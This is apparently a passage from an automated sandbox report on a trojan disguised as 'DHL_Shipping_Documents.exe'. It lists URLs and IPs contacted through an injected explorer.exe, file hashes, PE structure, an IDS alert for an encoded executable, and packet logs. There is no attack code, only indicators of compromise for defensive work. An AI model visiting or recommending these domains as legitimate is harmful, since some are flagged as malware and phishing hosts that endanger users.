http://www.xv1lz.cfd/cy12/www.ungravity.dev	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jhaganjr.comReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xv1lz.cfd	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pmugly.topReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.withscreamandsugar.com/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://word.office.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1000903527.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.com-safe.siteReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iu1.nj8qob.com:88/34/	explorer.exe, 00000003.00000002.3463568435.0000000010BFF000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3442486038.0000000005B7F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kslgd.link/cy12/www.ssongg3132.cfd	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.modestswimwearshop.comReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.com-safe.site/cy12/www.elfiensclinic.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.jhaganjr.com/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pmugly.top/cy12/www.jhaganjr.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://hm.baidu.com/hm.js?23e52f8a2f34650f474cdd7da74abfc8	explorer.exe, 00000003.00000002.3463568435.0000000010BFF000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3442486038.0000000005B7F000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.pmugly.top	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xcolpuj.xyz/cy12/www.xv1lz.cfd	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://outlook.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1000903527.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ssongg3132.cfd/cy12/www.hamidconstruction.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.withscreamandsugar.comReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hamidconstruction.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gaasmantech.net/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yourdesignneed.com/cy12/www.withscreamandsugar.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hamidconstruction.comReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thedivorcelawyer.websiteReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ungravity.dev	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.modestswimwearshop.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.routinelywell.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elfiensclinic.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xcolpuj.xyzReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yourdesignneed.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000003.00000002.3449753491.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.998701663.00000000093C3000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ssongg3132.cfd	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xcolpuj.xyz	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssongg3132.cfd/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gaasmantech.net/cy12/www.yourdesignneed.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.68.83	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
43.129.212.107	www.xv1lz.cfd	Japan	4249	LILLY-ASUS	false
103.156.178.63	www.pmugly.top	unknown	134687	TWIDC-AS-APTWIDCLimitedHK	false
192.229.221.95	unknown	United States	15133	EDGECASTUS	false
104.21.33.108	www.com-safe.site	United States	13335	CLOUDFLARENETUS	false
43.135.11.21	www.ssongg3132.cfd	Japan	4249	LILLY-ASUS	false
204.79.197.203	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
198.54.117.215	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
172.67.148.175	www.modestswimwearshop.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1307663
Start date and time:	2023-09-14 13:29:34 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10, Office Professional Plus 2016, Chrome 115, Firefox 115, Adobe Reader 23, Java 8 Update 381
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	DHL_Shipping_Documents.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@12/9
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 128 Number of non-executed functions: 293
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, geover.prod.do.dsp.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, slscr.update.microsoft.com, login.live.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:30:18	API Interceptor	1x Sleep call for process: DHL_Shipping_Documents.exe modified
13:30:24	API Interceptor	15428039x Sleep call for process: explorer.exe modified

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_Shipping_Documents.exe.log

Download File

Process:	C:\Users\user\Desktop\DHL_Shipping_Documents.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.348426668631405
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKAKhPKIE4oKqiKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh1oPtHochAHKze0HJ
MD5:	3449F05150847E4D3969CCA837E4A6AA
SHA1:	94A23D6FBBD3389B0019674A6B73F4312AF579A7
SHA-256:	F6B12276037CDAF4907651D712DA7F4856E2D439F3344CF1C4EA15F74CD0C105
SHA-512:	BA4A2F8B480B3FFAD133BF100AF815EE78A9753BE06C22374F7292DC4D0A588851B5AEE1DB78A8F0AE3E030A61DCD6AE25BED9A4C39E2273EF91120D53EA1993
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\45a9a2a2deda365165595326f2f13be6\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\bf1f4d743828bbf720baf57f6a37ce02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.763241438769742
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	DHL_Shipping_Documents.exe
File size:	651'264 bytes
MD5:	7581c03582cb6d3bb72e1e11af6bd9b0
SHA1:	c2682c9660609d8ba714ca96f3b87f282e7b0a6b
SHA256:	b799c685d108001c9d05b2faf48f4a1c0832067c7925c5f90258d224425e2faf
SHA512:	a337daea476a00bcbadc6662f3fe8d06fae8b1224140880858ea7874c28898561ed732902b0feb5ce9956a096810c6ee1e24bf16a1aacfc6c8ff9074bc5d8de5
SSDEEP:	12288:5q8RG2iNacQwE26NDsh/u42v9U6dyixTRlvMlTpMSHADuv2rxv+xspHzr1+z:5qqG1N6xsBmqUEZg6vm+xuH3
TLSH:	6CD4CDF924A4D3D6E37A63FF455380348A23BE555075C38E3BBD34980DA6B830A21DB6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.................0.............6.... ... ....@.. .......................`............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4a0536
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x89CE9F62 [Tue Apr 7 11:43:30 2043 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add dword ptr [eax], eax
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add eax, dword ptr [eax]
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add eax, 06000000h
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], al
add byte ptr [edx], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa04e2	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa2000	0x59c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9ea48	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9e57c	0x9e600	False	0.8656228418508287	data	7.771936955689464	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa2000	0x59c	0x600	False	0.41796875	data	4.0704336809755	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa4000	0xc	0x200	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xa2090	0x30c	data			0.4358974358974359
RT_MANIFEST	0xa23ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
194.180.49.211192.168.2.380497132018856 09/14/23-13:34:29.889496	TCP	2018856	ET TROJAN Windows executable base64 encoded	80	49713	194.180.49.211	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2023 13:30:18.478982925 CEST	49702	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:18.478984118 CEST	49703	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:28.088314056 CEST	49703	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:28.088435888 CEST	49702	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:45.541745901 CEST	49709	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:45.853899956 CEST	49709	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:46.463601112 CEST	49709	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:47.666451931 CEST	49709	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:48.761795998 CEST	49688	443	192.168.2.8	204.79.197.203
Sep 14, 2023 13:30:48.885457039 CEST	49689	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:49.072880983 CEST	49688	443	192.168.2.8	204.79.197.203
Sep 14, 2023 13:30:49.197917938 CEST	49689	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:49.682024002 CEST	49688	443	192.168.2.8	204.79.197.203
Sep 14, 2023 13:30:49.807141066 CEST	49689	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:50.072665930 CEST	49709	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:50.885338068 CEST	49688	443	192.168.2.8	204.79.197.203
